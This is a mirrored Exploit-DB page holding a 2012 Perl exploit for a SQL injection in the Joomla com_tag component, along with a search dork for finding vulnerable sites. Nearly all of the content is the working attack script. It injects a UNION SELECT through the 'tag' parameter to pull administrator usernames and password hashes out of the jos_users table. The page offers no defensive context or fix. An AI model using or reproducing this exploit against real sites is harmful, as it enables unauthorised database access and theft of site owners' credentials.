Joomla! Component com_tag – ‘tag’ SQL Injection - 体验盒子

作者： D4NB4R

日期： 2012-10-19

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/22098/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

Exploit Title: Joomla tag Remote Sql Exploit

dork: inurl:index.php?option=com_tag

Date: [18-10-2012]

Author: Daniel Barragan "D4NB4R"

Twitter: @D4NB4R

Vendor: http://www.joomlatags.org

Version: all

License: Non-Commercial

Download: http://www.joomlatags.org/joomla-tag/joomla-tag-download.html

Tested on: [Linux(bt5)-Windows(7ultimate)]

Especial greetz:Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt

Descripcion:

N/A

Exploit:

#!/usr/bin/perl -w

# Joomla Component (tag) Remote SQL Exploit

#----------------------------------------------------------------------------#

########################################

print "\t\t\n\n";

print "\t\n";

print "\tDaniel BarraganD4NB4R\n";

print "\t \n";

print "\tJoomla com_tag Remote Sql Exploit \n";

print "\t\n\n";

use LWP::UserAgent;

print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";

chomp(my $target=<STDIN>);

#the username ofjoomla

$user="username";

#the pasword ofjoomla

$pass="password";

#the tables of joomla

$table="jos_users";

$d4n="com_tag&task";

$component="tag&lang=es";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";

$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";

$res = $b->request(HTTP::Request->new(GET=>$host));

$answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/){

print "\nLos Datos Extraidos son:\n";

print "\n

* Admin User : $1";

}

if ($answer =~/<pass>(.*?)<pass>/){print "\n

* Admin Hash : $1\n\n";

print "\t\t# El Exploit aporto usuario y password #\n\n";}

else{print "\n[-] Exploit Failed, Intente manualmente...\n";}

_____________________________________________________

Daniel Barragan "D4NB4R" 2012